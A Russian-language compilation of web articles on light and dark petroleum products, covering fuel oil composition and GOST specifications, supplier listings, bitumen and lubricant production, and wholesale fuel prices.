Светлые и тёмные нефтепродукты: мазуты и другие виды

Мазут – это горючая вязкая жидкость, горючее топливо. Представляет собой остаток после выделения из нефти или продуктов её вторичной переработки бензиновых, керосиновых и газойлевых фракций, выкипающих до 350-360 °С.

  • Мазут, как топливо
  • Химический состав мазута
  • Марки и виды мазута
  • Требования ГОСТ  к физико-химическим показателям мазута
  • Физические свойства мазута. Температура застывания, вспышки, воспламенения и самовоспламенения мазута
  • Применение мазута
  • Другие виды топлива: биодизель, биотопливо, газойль, горючие сланцы, керосин, лигроин, мазут, нефть, попутный нефтяной газ, природный газ, свалочный газ, сланцевая нефть, сланцевый газ, синтез-газ

Мазут, как топливо:

Мазут (с арабского «мазхулат» – «отбросы») – жидкий продукт тёмно-коричневого или черного цвета. Мазут – это горючая вязкая жидкость, горючее топливо.

Мазут представляет собой остаток после выделения из нефти или продуктов её вторичной переработки бензиновых, керосиновых и газойлевых фракций, выкипающих до 350-360 °С. Также мазут получают из каменного угля и  горючих сланцев, однако такое производство развито в небольших объемах.

Основным показателем качества мазута при его маркировке является вязкость, определяющая условия заполнения и слива баков, цистерн, танкеров и других емкостей, транспортирования мазута по трубопроводам, подачи его в топочное пространство печей и т.д.

Вязкость мазута оценивается в единицах условной вязкости (°ВУ) и определяется отношением времени непрерывного истечения 200 мл мазута при заданной температуре к времени истечения такого же объема дистиллированной воды при температуре 20 °С. Вязкость мазута зависит от температуры, плотности и смолистости.

При низких температурах вязкость мазута значительно возрастает, поэтому слив его из емкостей и перекачка по трубопроводам могут проводиться только после предварительного подогрева топлива.

Плотность мазута колеблется в пределах 0,89-1,02 г/см3 и повышается с увеличением вязкости. Чем меньше плотность мазута, тем легче и быстрее отделяются от него вода и механические примеси.

Мазут обладает высокими загрязняющими свойствами. При сжигании мазута на открытом пространстве выделяется значительное количество черной копоти, которая наносит ущерб окружающей среде и токсична для человека.

Химический состав мазута:

  1. Мазут по своему химическому составу представляет собой смесь различных углеводородных и неуглеводородных компонентов:
  2. – углеводородов с молекулярной массой от 400 до 1000 г/моль,
  3. – нефтяных смол с молекулярной массой от 500 до 3000 и более г/моль,
  4. – асфальтенов,
  5. – карбенов,
  6. – карбоидов,
  7. – органических соединений, содержащих металлы (ванадий V, никель Ni, железо Fe, магний Mg, натрий Na, кальций Ca).
  8. Физико-химические свойства мазута зависят от химического состава исходной нефти и степени ее переработки – отгона дистиллятных фракций.
  9. Ниже в таблице приводится элементный состав мазута:
Наименование химического элемента: %% содержание
Углерод, С 83-87
Водород, Н 10-12
Сера, S 1-3,5
Азот и кислород, N + O 0,2-1,9
и прочие примеси (включая воду и механические примеси)

В соответствии с ГОСТом 10585-2013 «Топливо нефтяное. Мазут. Технические условия» в зависимости от назначения установлены следующие марки мазута:

  • – флотский Ф5,
  • – топочный 40,
  • – топочный 100.
  • Обозначение мазута включает в себя:
  • – для мазута флотского – марку и массовую долю серы. Например, мазут флотский Ф5, 1,50% по ГОСТ 10585-2013,

– для мазутов топочных – марку, массовую долю серы, зольность и температуру застывания. Например, мазут топочный 100, 2,00%, малозольный, 25 °С по ГОСТ 10585-2013.

По уровню содержания серы мазут подразделяется на малосернистый – не больше 0,5 % серы, сернистый – до 1 % и высокосернистый – до 3,5 %.

ГОСТом 10585-2013 «Топливо нефтяное. Мазут. Технические условия» установлены следующие требования к физико-химическим показателям мазута:

Наименование показателя Значение для марки 
флотский Ф5 топочный 40 топочный 100
Вязкость кинематическая, мм2/с, не более:
при 50 °С 36,20
при 80 °С 59,00
при 100 °С 50,00
или
вязкость условная при 100 °С, градусы ВУ, не более 6,80
Зольность, %, не более, для мазута:
малозольного 0,04 0,05
зольного 0,05 0,12 0,14
Массовая доля механических примесей, %, не более 0,10 0,5 1,0
Массовая доля воды, %, не более 0,3 1,0 1,0
Содержание водорастворимых кислот и щелочей Отсутствие
Массовая доля серы, %, не более
1,00 0,50 0,50
1,50 1,00 1,00
1,50 1,50
2,00 2,00
2,50 2,50
3,00 3,00
3,50 3,50
Коксуемость, %, не более 6,00
Содержание сероводорода, ppm (мг/кг), не более 10 10
Температура вспышки, °С, не ниже:
в закрытом тигле 80
в открытом тигле 90 110
Температура застывания, °С, не выше Минус 5 10 25
для мазута из высокопарафинистых нефтей 25 42
Теплота сгорания (низшая) в пересчете на сухое топливо (небраковочная), кДж/кг, не менее, для мазута с содержанием серы, %: 41454
0,50, 1,00, 1,50, 2,00 40740 40530
2,50, 3,00, 3,50 39900 39900
Плотность при 15 °С, кг/м3, не более 958,3 Не нормируется. Определение обязательно
Выход фракции, выкипающей до 350°С, % об., не более 22 17 17

Физические свойства мазута. Температура застывания, вспышки, воспламенения и самовоспламенения мазута:

Наименование параметра: Значение:
Цвет тёмно-коричневый или черный
Запах слабый запах нефти
Плотность мазута (при 20 °C и атмосферном давлении 1 атм.), кг/м3 890-1020
Вязкость мазута (мм²/с (при 100 °C) 8-80
Температура застывания мазута*, °C от -5 до 42 (в зависимости от марки)
Температура воспламенения мазута**, °C от 91 до 155
Температура самовоспламенения мазута, °C около 350
Температура вспышки мазута***, °C от 80 до 112
Взрывоопасные концентрации смеси паров мазута с воздухом, % объёмных от 1,4 до 8
Удельная теплота сгорания, МДж/кг 39,9-41,4
  1. Примечание:
  2. * – температура застывания — это температура, при которой нефтепродукт теряет подвижность в условиях испытания. Температурой застывания считают температуру, при которой уровень нефтепродукта в стандартной плоскодонной пробирке при ее наклоне под 45° не меняет своего положения в течение 1 минуты;
  3. ** – температура воспламенения – это температура горючего вещества, при которой оно выделяет горючие пары и газы с такой скоростью, что после воспламенения их от источника зажигания возникает устойчивое горение;
  4. *** – температура вспышки называют такую температуру, при которой пары нефтепродукта образуют с окружающим воздухом смесь, вспыхивающую при поднесении к ней огня.

Применение мазута:

Мазуты применяются в качестве топлива для паровых котлов, котельных установок и промышленных печей, в двигателях морских судов и тепловозов.  Мазут является ценным сырьем для химической промышленности.

  • – биодизель,
  • – биотопливо,
  • – газойль,
  • – горючие сланцы,
  • – керосин,
  • – лигроин,
  • – мазут,
  • – нефть,
  • – попутный нефтяной газ,
  • – природный газ,
  • – свалочный газ,
  • – сланцевая нефть,
  • – сланцевый газ,
  • – синтез-газ.

Примечание: © Фото https://www.pexels.com, https://pixabay.com

  1. карта сайта
  2. чем отмыть отстирать мазут топливо с одежды м 100 2 40 в домашних условиях цена топочный температура гост
    куплю нефть масла бензин дизельный мазут резервуар дизельное топливо
    пятна тонна характеристики перегонка цистерна вязкость хранение стоимость мазута переработка плотность подогреватель сжигание виды мазута воды
    котел куртка в на мазуте
    чем вывести выводить оттереть очистить мазут

Источник: https://xn--80aaafltebbc3auk2aepkhr3ewjpa.xn--p1ai/mazut-himicheskiy-sostav-svoystva-i-primenenie/

Поставщики темных нефтепродуктов

Выберите нужный регион:

Все регионыАрхангельская область (2)Вологодская область (1)Калининградская область (2)Костромская область (1)Москва и Московская область (3)Мурманская область (2)Ненецкий автономный округ (1)Новгородская область (2)Пермский край (1)Псковская область (2)Республика Башкортостан (2)Республика Карелия (1)Республика Коми (1)Рязанская область (1)Самарская область (1)Санкт-Петербург и Ленинградская область (2)Ямало-Ненецкий автономный округ (1)Ярославская область (1)

г. Москва (Москва и Московская область), г. Ярославль (Ярославская область)

Оптовые поставки мазута и других нефтепродуктов в регионы России. Мультимодальные перевозки.

Подробнее

г. Рязань (Рязанская область)

ООО «РЕАЛ-ОЙЛ» — поставщик темных и светлых нефтепродуктов по всей территории России. Высокое качество нефтепродуктов.

Подробнее

г. Чайковский (Пермский край)

ООО «ТЕХНОТРЕЙД» — оптовый поставщик темных нефтепродуктов в Пермском крае. Компания продает печное топливо темное нефтяное, производителей Лукойл, Роснефть, Славянск ЭКО, Ильский НПЗ, со склада в городе Чайковский.

Подробнее

(Москва и Московская область)

Поставщик нефти, нефтепродуктов, нефтехимии и сжиженных углеводородных газов как с российских, так и зарубежных НПЗ, в том числе Республики Азербайджан.

Подробнее
г. Москва (Москва и Московская область)

Отделение Центрального филиала «Газпромнефть-Региональных продаж» в Москве осуществляет мелкооптовую продажу  темных нефтепродуктов в Москве, Московской и Калужской областях. Отделение предлагает к продаже мазут М-100, дорожные битумы БНД 60/90 и другие нефтепродукты.

Подробнее

г. Уфа (Республика Башкортостан)

Поставки нефтебитумов по России, странам Таможенного Союза и Дальнего зарубежья на условиях FCA, CPT, DAP, FOB по Инкотермс-2010. ООО «Дорожные Инновационные системы» — производитель фасованной продукции. Доставка в металлических бочках по 200 кг, кловертейнерах по 1000 кг, Биг-Бегах по 1100 кг.

Подробнее

г. Тольятти (Самарская область)

Компания «Макстон» реализует нефтепродукты: мазут, битум, топливо печное бытовое. ООО «Макстон» имеет большой опыт в осуществлении поставок крупных партий ГСМ, производства ФОРАС, Роснефть, Лукойл, ТАИФ-НК.

Подробнее

г. Иглино (Республика Башкортостан)

Реализуем битум БНД 60/90, 90/130 фасованный в бочки по 200 кг с отгрузкой по ЖД иавтотранспортом по РФ и в ближнее зарубежье.

Подробнее

(Санкт-Петербург и Ленинградская область)

Отделение Центрального филиала «Газпромнефть-Региональных продажи» в Санкт-Петербурге осуществляет мелкооптовую продажу нефтепродуктов в Санкт-Петербурге, Ленинградской, Архангельской, Калининградской, Мурманской, Новгородской и Псковской областях. Отделение предлагает к продаже мазут М-100, газ, дорожные битумы БНД 60/90, БНД-У 100/130 и другие нефтепродукты.

Подробнее

(Москва и Московская область)

Компания «Газойл Центр» реализует темные нефтепродукты: мазут, битум, нефть. ООО «Газойл Центр» предлагает отгрузку вагонами и прокачку по трубе. Компания реализует нефтепродукты на Российском рынке, включая Крым.

Подробнее

(Санкт-Петербург и Ленинградская область)

Предприятие реализует крупным и мелким оптом темные нефтепродукты изготовленные на заводах Группы «ЛУКОЙЛ» в Санкт-Петербурге, Ленинградской, Псковской, Новгородской, Мурманской, Архангельской, Калининградской областях, республике Карелия, республике Коми, в Ненецком и Ямало-Ненецком АО. Предлагаемые нефтепродукты — битум дорожный БНД 60/90 и 90/130; топочный мазут 100, IV вида, зольный с температурой застывания 42°С.

Подробнее

Источник: https://neftregion.ru/postavschiki-nefteproduktov/postavschiki-temnykh-nefteproduktov

Светлые и темные нефтепродукты – классификация и сфера их применения

10.03.2019

Все вещества, получаемые из нефти, условно делятся на светлые и темные нефтепродукты. Всего на данный момент количество наименований таких товаров превышает 500, но из них наиболее распространены:

  • Бензин.
  • Керосин.
  • Мазут.
  • Растворители.
  • Разница в окрасе между темными и светлыми нефтепродуктами
  • Не забываем также про дизтопливо – светлый нефтепродукт, который получает все более широкое распространение.

Темные и светлые нефтепродукты отличить очень просто – в первых в немалом количестве присутствуют различные примеси, из-за которых цвет вещества может меняться от темно- до светло-коричневого. Светлые же очищены от тяжелых фракций и представляют собой прозрачную жидкость, иногда со слабым желтоватым оттенком

Итак, вернемся к исходной классификации и разберемся, что относится к светлым и темным нефтепродуктам:

  • Озвучим, в чем разница между этими группами товаров.
  • Опишем их свойства.
  • Расскажем, для какой сферы применения они разработаны и так далее.

Классификация темных нефтепродуктов

Темные нефтепродукты, перечень которых представлен ниже, содержат в составе немало различных тяжелых примесей, которые дают продукции темный непрозрачный цвет. Отсюда, собственно, и возникло название группы. Основные товары, относящиеся сюда – это:

  • Гудроны. Продукт, остающийся после перегонки нефти. Из него изготавливается масса нефтепродуктов: битум, масла, газы и прочее.
  • Мазут. Густая жидкость темно-коричневого цвета. Используется для изготовления машинных масел, или как топливо для печей. Также из него производят кокс и битум.
  • Дистиллятные масла. Изготавливаются из мазута с помощью фенола, который используется для очистки от различных примесей. В результате переработки получают машинные масла.
  • Моторные топлива. Темные нефтепродукты, ГОСТы которого должны четко соблюдаться, ведь на них функционируют газовые турбины.
  • Битумы. Это отличный вяжущий материал, без которого не смогли бы обойтись такие сферы промышленности, как строительство или укладка дорог.
  • Вакуумный газойль. Необходим при производстве ДТ.

Так, мы разобрали, что относится к темным нефтепродуктам. Далее в статье мы более подробно рассмотрим другую крупную группу продуктов нефтяной промышленности.

Диаграмма – процентное соотношение производимых нефтепродуктов

Перечень и описание светлых нефтепродуктов

Светлые нефтепродукты, перечень которых мы предоставим ниже, являются конечным результатом процесса перегонки нефти. К ним относится такая продукция, как:

  • Дизтопливо.
  • Бензин.
  • Керосин.

Чистота любого из них напрямую зависит от того, насколько качественно была выполнена переработка. Немаловажна и глубина их очистки, то есть соотношение объема полученного продукта к затраченным на этот процесс углеводородам.

Распространяющиеся на светлые нефтепродукты ГОСТы, необходимо соблюдать. Ведь от чистоты горючего зависит многое. В первую очередь – долговечность двигателей, для которых это топливо выпускается. Также создано множество классификаций нефтепродуктов, как в России, так и в Европе, регламентирующих их экологическую безопасность. И с каждым разом эти требования ужесточаются.

Разберем более подробно каждый из продуктов.

Дизтопливо

Дизтопливо – один из наиболее распространенных видов горючего. Производится из керосиново-газолейных соединений путем прямой перегонки. Широко используется для заправки дизельных двигателей, славящихся своей надежностью и экономичностью. К производству современных видов ДТ применяются очень высокие требования.

Бензин

Бензин – представляет собой легкую смесь углеводородов. Температура кипения – от 33 до 205 градусов Цельсия, в зависимости от используемых присадок. Чистота бензина, так же как и ДТ, регламентируется множеством стандартов. Их соблюдение необходимо для продолжительной работы двигателей и охраны окружающей среды от загрязнения.

Керосин

Керосин представляет собой прозрачную жидкость с желтым оттенком. Одни из основных преимуществ является низкая летучесть вещества, что позволяет применять его во множестве сфер – от отопления до заправки авиационных двигателей. Из керосина также производится немалое количество растворителей.

Лигроин

Лигроин сегодня чаще всего используется как растворитель. Но еще не так давно ним часто заправляли дизельные двигатели. Сейчас же по большей части – это сырье в нефтепромышленности, из которого получают различные высокооктановые добавки.

Схематическое отображение процесса переработки нефти

Итак, мы описали основные жидкости, подпадающие под определение «светлые нефтепродукты». Но не стоит забывать, что наименований бензина, керосина и ДТ существует невероятное количество. И каждый из сортов предназначен для определенной цели.

Если желаете получить более точную информацию, касательно такой продукции, как светлые и темные нефтепродукты, вы всегда можете обратиться за помощью к консультантам компании «Амокс». Мы занимаемся продажей нефтепродуктов не первый год и знаем о них все!

Заполните форму обратной связи, наши менеджеры свяжутся с вами!

Источник: https://ammoxx.ru/articles/svetlye-i-temnye-nefteprodukty-klassifikatsiya/

Светлые и темные нефтепродукты

Разделение нефтепродуктов на светлые и темные имеет достаточно условное значение. Существует большое число стандартизованных классификаций, однако деление продуктов из нефти таким способом наиболее удобно в сферах их обращения. Поэтому оно активно используется в течение последних ста лет.

Светлые смеси углеводородов дороже темных, поэтому наиболее продвинутые комплексы переработки в Европе и США производят из единицы объема сырья больше светлых продуктов (до 95 %), чем НПЗ с технологиями XX века (60-70 %). Впрочем, указанный выход существенно зависит от качества горючей жидкости.

Светлые

Все технологии переработки очищают получаемые продукты от содержащихся в них аморфных и окрашенных веществ. Чем выше их эффективность, тем прозрачнее получаются результирующие продукты и менее плотным — их состав.

  • Сегодня к светлым смесям (white products) относят:
  • Нафта (лигроин) — это жидкая смесь углеводородов, применяемая при производстве бензина, высокооктановых добавок, реактивного топлива, керосина осветительного и растворителей.
  • Все светлые продукты не содержат тяжелые нефтяные фракции. Их плотность не превышает величин:
  • для бензина — 0,71-0,75 г/см³;
  • для керосина — 0,75-0,78 г/см³;
  • для реактивного топлива — 0,84 г/см³;
  • для дизельного топлива — 0,8-0,85 г/см³.

Темные

Если светлые смеси углеводородов условно считаются легковоспламеняющимися веществами с температурой вспышки паров до +61 ºС, то темные продукты — горючими веществами с температурой вспышки более +61 ºС.

Темные, в свою очередь, отличаются от светлых большим содержанием различных остатков переработки, обладающих большой молекулярной массой, они практически непрозрачны. К первым относятся:

  1. мазуты;
  2. газотурбинное топливо;
  3. дистиллятные масла;
  4. вакуумные газойли;
  5. гудроны;
  6. битумы;
  7. печное топливо;
  8. солидол и другие.

Плотность темных смесей углеводородов выше светлых. Так, плотность мазутов 0,89–1,0 г/см³, дистиллятных масел — 0,91–0,98 г/см³, гудрона — 0,99–1,0 г/см³, битумов — 0,95–1,5 г/см³.

Темные, в отличие от светлых, обладают:

  • более высокой плотностью (до 1 г/см³ и более);
  • низкой испаряемостью;
  • значительной вязкостью;
  • непрозрачностью;
  • низкими температурами вспышки паров;
  • наличием более сложных химических реакций в процессе горения;
  • меньшей ценой.

Источник: http://dostavka-toplivo-spb.ru/poleznye-stati/140-svetlye-i-temnye-nefteprodukty

Темные нефтепродукты: производство и рыночные ниши мазута, битума, смазочных материалов

Темные — общее название всех типов мазутов и дистиллятных масел. К этой категории также относится битум, гудрон и вакуумный газойль, то есть продукты нефтепереработки, состоящие из тяжелых остатков фракционирования нефти. Как следует из названия, все они имеют темный цвет.

Полимерно-модифицированный битум входит в состав верхнего дорожного слоя на американских хайвеях, немецких автобанах и итальянских автострадах. ПМБ, изготовленный по технологии Styrelf, применяют в покрытиях на взлетно-посадочных полосах, сложнейших горных дорогах и гоночных трассах класса «Формулы-1».

Одна из основных разновидностей тяжелого жидкого топлива — топочные мазуты. Они используются в котельных агрегатах электростанций, в технологических печах в металлургической, химической, нефтеперерабатывающей промышленности и сельском хозяйстве, в судовых котельных установках, газовых турбинах.

Хотя мазутом называют остатки первичной перегонки нефти, топочный мазут — это, как правило, многокомпонентное топливо, в которое, помимо прямогонного мазута, добавляют фракции, оставшиеся после процессов крекинга и висбрекинга, тяжелые газойли каталитического крекинга, термокрекинга и коксования, отходы масляного производства, легкие газойли вторичных процессов. Вязкости мазута в соответствии со стандартами помогает поддержать добавление более легких дистиллятов.

Вязкость мазута может варьироваться в значительных пределах, а потому это важнейший показатель качества котельных и тяжелых моторных топлив, который положен в основу маркировки мазута. Вязкость влияет на выбор способа сливных и наливных операций при его отгрузке, на их продолжительность, на условия транспортировки продукта, эффективность работы форсунок двигателя, распыляющих топливо.

Качество этого вида топливатакже определяют такие характеристики мазута, как содержание воды, механических и минеральных примесей, зольность*, температура застывания и вспышки**, теплота сгорания. От них зависят условия применения горючего.

Например, для топлив, которые используются в газотурбинных установках, очень важно низкое содержание ванадия и серы, так как они вызывают коррозию турбинных лопаток.

А влага в мазуте может привести к расстройству режима горения из-за возможного образования водных пробок, прерывающих равномерную подачу топлива к форсункам.

Еще одна важная характеристика — коксуемость топлива, способность образовывать твердый углеродистый осадок на деталях топливной системы при нагревании без доступа воздуха.

Высокий показатель коксуемости нежелателен для котельных топлив, так как с ним связано повышенное отложение кокса возле устья форсунок, из-за чего искажается форма факела, ухудшается распыление топлива, оно сгорает не полностью.

Повышение глубины переработки нефти на НПЗ с соответственным сокращением объема производства нефти и увеличением выхода маржинальных продуктов — один из стратегических приоритетов » Газпром нефти«.

Компания занимает лидирующие позиции как на рынке битумных материалов в целом, так и среди инновационных полимерно-битумных вяжущих в частности. Ежегодный объем продаж битумных материалов составляет порядка 1,75 млн тонн.

Основные мощности «Газпром нефти» по производству битумов расположены в Москве, Омске, Ярославле, Рязани, а также в Сербии и Казахстане. Компания активно поддерживает внедрение инновационной составляющей в производство битумной продукции.

В 2014 году на совместном предприятии «Газпромнефть-Тоталь ПМБ» на Московском НПЗ запущено производство полимерно-битумного вяжущего премиум-класса G-Way Styrelf. Этот ПБВ отличается повышенными эксплуатационными характеристиками.

Они достигаются модификацией вещества на химическом уровне за счет введения специального реагента, позволяющего формировать устойчивую трехмерную пространственную структуру продукта. Как показали первые опыты эксплуатации такого ПБВ на экспериментальных участках автодорог, дорожное покрытие с применением современных вяжущих более устойчиво к образованию колеи и трещин, а также к воздействию высоких транспортных нагрузок.

Широк и ассортимент масел и смазок, которые производятся «Газпром нефтью». Компания занимает значительные рыночные ниши в индустриальном сегменте, выпускает судовые масла и все виды автомобильных масел и смазок.

За несколько лет «Газпром нефти» удалось занять значительную нишу на российском рынке моторных масел, в том числе и в массовом сегменте масел для легковых автомобилей. Масла выпускаются под брендами «Газпром нефть» и G-Energy.

Последний бренд относится к категории премиальных.

Игольчатый кокс — ценное сырье для производства графитированных электродов. Такие электроды способны выдерживать большие электрические токи и применяются в электродуговых печах для изготовления спецстали. Игольчатый кокс получают на установках замедленного коксования из тяжелых остатков различных процессов.

Последнее десятилетие потребление мазута в мире перманентно уменьшалось. Предполагается, что эта тенденция сохранится и дальше. Причина тому — высокое содержание вредных веществ в попадающих в атмосферу продуктах сжигания этого топлива и увеличение глубины переработки нефти.

* Зольность — массовая доля золы, содержание в процентах негорючего остатка, который создается при полном сгорании топлива. ** Температура вспышки — наименьшая температура, при которой пары над поверхностью жидкого нефтепродукта способны вспыхнуть при поднесении огня.

Битум: вчера, сегодня, завтра

Масла под брендом G-Energy — непременный участник большинства престижных мировых автогонок, в том числе и ралли-марафона «Дакар»

Битум — один из наиболее распространенных и древнейших строительных материалов. В эпоху неолита природный, образовавшийся естественным путем в местах выхода нефти на поверхность битум начали использовать для изготовления посуды раньше, чем глину.

Для строительства его широко применяли в Древнем Шумере, на территории которого других строительных материалов было немного. Битум смешивали с песком и гравием и из этой массы изготавливали кирпичи.

Также он использовался для гидроизоляции, при строительстве каналов, оросительных систем, дорог, как связующее вещество при создании мозаик.

Нефтяной битум — полутвердый или твердый продукт. Однако он представляет собой аморфное вещество. Это значит, что в твердом состоянии он не кристаллизуется, а при нагревании переходит из твердого состояния в жидкое, постепенно размягчаясь. Твердый битум ведет себя как очень густая жидкость.

Это демонстрирует эксперимент, начатый в 1927 году в Университете Квинсленда (Австралия). Нагретый битум налили в стеклянную воронку с запечатанной трубкой. Через три года воронку распечатали, и битум начал медленно вытекать через трубку. Первая капля упала в 1938 году, вторая — в 1947-м.

Эксперимент продолжается до сих пор, к настоящему моменту из воронки вытекло девять капель вещества.

Битумных озер — естественных источников битума на поверхности земли, которые имели бы промышленное значение, в мире осталось мало.

Битумосодержащую породу сегодня добывают в карьерах и шахтах, при помощи скважин идет добыча сверхвязкой битуминозной нефти.

Кроме того, битум получают из остаточных продуктов нефтепереработки: гудронов*, асфальтов деасфальтизации, экстрактов селективной очистки масляных фракций и др.

Чтобы улучшить качество нефтяного битума, в гудроны и тяжелые остатки переработки мазута добавляют до 30% других продуктов. Без добавок вяжущие становятся хрупкими и теряют эластичность.

Современные битумные материалы — полимерно-битумные вяжущие — производятся на основе обычных битумов с добавлением полимеров типа СБС (стирол-бута-диен-стирол) и пластификатора.

По сравнению с традиционными продуктами они обладают повышенной сопротивляемостью к деформации, лучше себя ведут при высоких и низких температурах, более долговечны.

Сегодня область применения битума — дорожное строительство, производство кровельных, гидроизоляционных материалов, резиновая, лакокрасочная, кабельная промышленность. Дорожный битум служит вяжущим между каменными составляющими асфальтобетонной смеси — основного материала для строительства дорог.

* Гудрон — вязкая жидкость или твердый асфальтоподобный продукт черного цвета. Представляет собой остаток после отгонки из нефти фракций, выкипающих свыше 450°C. Используется для производства дорожных, кровельных и строительных битумов, малозольного кокса, смазочных масел, мазута, горючих газов.

Коэффициент трения

Смазочные масла уменьшают коэффициент трения между трущимися поверхностями, снижают интенсивность изнашивания, защищают металлы от коррозии, охлаждают трущиеся детали, уплотняют зазоры между ними.

Продукты перегонки нефти впервые стали использовать как смазку в 70-х годах XIX века. Американец Джон Эллис, пытаясь найти нефти медицинское применение, обнаружил, что она обладает хорошими смазочными свойствами. Вскоре ему удалось произвести масло, которое было значительно более эффективным при высоких температурах, чем традиционно применяемые животные и растительные жиры.

Базовые масла бывают минеральными (очищенные продукты переработки нефти), синтетическими (их составляющие получены путем органического синтеза из более простых углеводородных соединений) и полусинтетическими (смеси первых и вторых). Минеральные масла получают из продуктов вакуумной перегонки мазута (фракции с температурой кипения 350—400°C, 400—450°C, 450—500°C) и деасфальтизации* гудрона жидким пропаном.

Синтетические масла появились значительно позже, чем минеральные. Их разработка началась в середине XX века для нужд авиации, а в 1970-х годах синтетику стали применять и для автомобильных моторов.

Синтетические масла отличаются тем, что их вязкость меньше меняется при изменении температуры. Кроме того, у них ниже температура застывания, выше стойкость к окислению, они лучше переносят нагрузки.

Впрочем, есть и недостатки: они могут вызывать усадку резиновых уплотнений и коррозию сплавов цветных металлов. Товарные масла получают добавлением к базовым специальных присадок.

Это позволяет изменить их свойства, усилить преимущества и сократить недостатки.

Синтетические масла отличаются тем, что их вязкость меньше меняется при изменении температуры. Кроме того, у них ниже температура застывания, выше стойкость к окислению, они лучше переносят нагрузки.

Впрочем, есть и недостатки: они могут вызывать усадку резиновых уплотнений и коррозию сплавов цветных металлов. Товарные масла получают добавлением к базовым специальных присадок.

Это позволяет изменить их свойства, усилить преимущества и сократить недостатки.

* Деасфальтизация — извлечение из остаточных продуктов дистилляции нефти растворенных в них смолисто-асфальтеновых веществ с помощью легких растворителей, таких как жидкий пропан или бутан.

… И прочие продукты

Из нефти также получают технический углерод (сажу), кокс. Сажа — это мелкие частицы углерода. Это продукт неполного сгорания или термического разложения (нагрева без доступа воздуха) углеводородного сырья — высокоароматизированных фракций нефти, природных и попутных газов.

Технический углерод используют при производстве резины, пластмасс и некоторых сплавов, а также черных пигментов для полиграфической и лакокрасочной промышленности. Кокс, как и сажа, преимущественно состоит из углерода.

Он применяется при выплавке алюминия, изготовлении химической аппаратуры, работающей в условиях агрессивных сред, в ракетной технике и других областях. Кокс получают из нефтяных остатков (гудронов, крекинг-остатков, тяжелых газойлей, остатков масляного производства и т. п.

) с помощью коксования — разновидности процесса глубокого термического крекинга, при котором из тяжелых нефтяных остатков окончательно удаляются все легкие и относительно легкие фракции углеводородов.

Источник: https://www.gazprom-neft.ru/press-center/sibneft-online/archive/557/1113500/

Нефтепродукты светлые темные

Нефтепродукты, дизельное топливо, ДТЛ, ДТЗ, печное топливо, мазут, битум, автомобильное топливо, широкая фракция легких углеводородов, керосин, ТС-1, топливо самолетное, бензин, бензин Нормаль-80, бензин Регуляр-92, БГС (бензин газовый стабильный), прямогонный, прямогон, бензиновая фракция, СУГ, СПБТ, ПБТ, ПБА, газ, пропан, бутан, ШФЛУ, ГКС, газовый конденсат светлый, СГК, нефть.

В заявках обязательно: реквизиты потребителя (получателя), включая банковские, коды станций и получателей по ЖД, а так же контактная информация потребителя (получателя) (Word). Акт ввода в эксплуатацию ГНС – требуется для СУГ. По нефти, СУГ информация о договоре аренды ГНС (или о собственности), переработке или хранения.

 Нефть (нефтепродукты) по трубопроводу, перекачиваются только на договор контрагента. Объемы, установленные в договоре. Заявки направляйте в департамент сбыта, принимаются до 20 числа текущего месяца на поставки в следующем месяце. Цена формируется с 25 числа текущего месяца до начала следующего. Цена действительна три дня с момента выставления счета.

 Последние отгрузки. Отгрузка ЖД и перекачка трубопроводом. Цены только по заявкам. По каждому продукту уточняйте адресат производителя (поставщика). Вся информация адресуется на имя генерального директора Андрея Викторович Филатова. Экспорт.

Работаем только после получения ICPO (в том числе на русском, или получения сопроводительного письма на русском). (Делайте запрос форм).

Светлые нефтепродукты внутренний рынок

Светлые нефтепродукты внутренний рынок

АИ-95 Янос 55 200 ρ=0.75 Московский НПЗ 57 500 СНС 57 500 ρ=0.74 ННС 57 500 ρ=0.74 НБ Часцы 56 100 ρ=0.744

АИ-92 Янос 52 700 ρ=0.745 Московский НПЗ 53 100 ρ=0.737 СНС 53 100 ρ=0.737 ННС 53 100 ρ=0.737 НБ Часцы 53 700 ρ=0.74

Дизельное Топливо Евро Московский НПЗ (Евро сорт F) 52 600 ρ=0.835 НБ Часцы (Дт-З-К5) 55 800 ρ=0.814 Янос (ДТ-З-К5) 53 700 ρ=0.826 Янос (Евро сорт E) 52 100 ρ=0.835 СНС (Евро сорт Е) 52 600 ρ=0.84

Прямогонный бензин (Нефрас) Белгородский НПЗ – пос. Строитель (ТВ вид 2) 41 500 ρ=0.72

Газовый конденсат Новый Уренгой (УТНИ) 42 900 ρ=0.785 СПб Гарант (Обский)  47 500 ρ=0.781 Улыбышево (Крым) 44 500 ρ=0.

73 НБ Луховицы (Обский) 48 000 ρ=0.78 НБ Обнинск (Обский) 48 000 ρ=0.78 СПб Красное село  (Обский) 47 500 ρ=0.78 Ярославль (Обский) 48 000 ρ=0.

78 НБ Луховицкая (УТНИ46 500 ρ=0.772

Авиационный керосин ТС-1 Янос 54 300 ρ=0.75 НБ Шамбала (г.Электросталь) 53 600 ρ=0.804

Аналоги Дизельного топлива (ДГК, ТММЛ, ТТС)

1-й НПЗ г. Калуга: 1-й НПЗ г. Калуга (ТМТ 2/ДГК) 50 000  ρ=0.83

Менделеевский НПЗ: Менделеевский НПЗ Ярославль 49 500  ρ=0.843

Новошахтинский НПЗ: Новошахтинский НПЗ (Газойль низко-застывающий) 49 900 ρ=0.835 Новошахтинский НПЗ (Газойль низко-застывающий) ЖД 47 000 ρ=0.835

НПЗ НС-Ойл: НПЗ НС-Ойл п.Новоспасское (Кгф Вид I сера 0,3) 48 700 ρ=0.825 НПЗ НС-Ойл п.Новоспасское (Кгф Вид I сера 0,5) 47 400 ρ=0.845

Славянский НПЗ: Славянский НПЗ (ФН летняя)  49 000 ρ=0.845 Славянский НПЗ (ФН демисезонная) 49 500 ρ=0.844

Ильский НПЗ: Ильский НПЗ (ТНЗ) 49 700 ρ=0.835

Танеко НПЗ: Танеко НПЗ (ДТФ марка Б) 48 500 ρ=0.821 НБ Белые столбы (ДТФ марка Б) 50 800 ρ=0.838

Белгородский НПЗ: Белгородский НПЗ – пос. Строитель (ТВ вид 1) 50 000 ρ=0.83

СТНТ НПЗ (Самар.обл/Николаевка): СТНТ НПЗ (Топливо судовое) 48 500 ρ=0.827

Тёмные нефтепродукты внутренний рынок

Тёмные нефтепродукты внутренний рынок

Мазут М-100 Московский НПЗ 18 500 Янос 18 900 Самара 24 500 ρ=0.924

Битум БНД 60/90 Сафоново 18 200 Рязанская НПК 17 600 Рыбное 17 600 ρ=1

Источник: https://gasoil-center.ru/nefteprodukty-svetlye-temnye/

Улучшение свойств тёмных нефтепродуктов

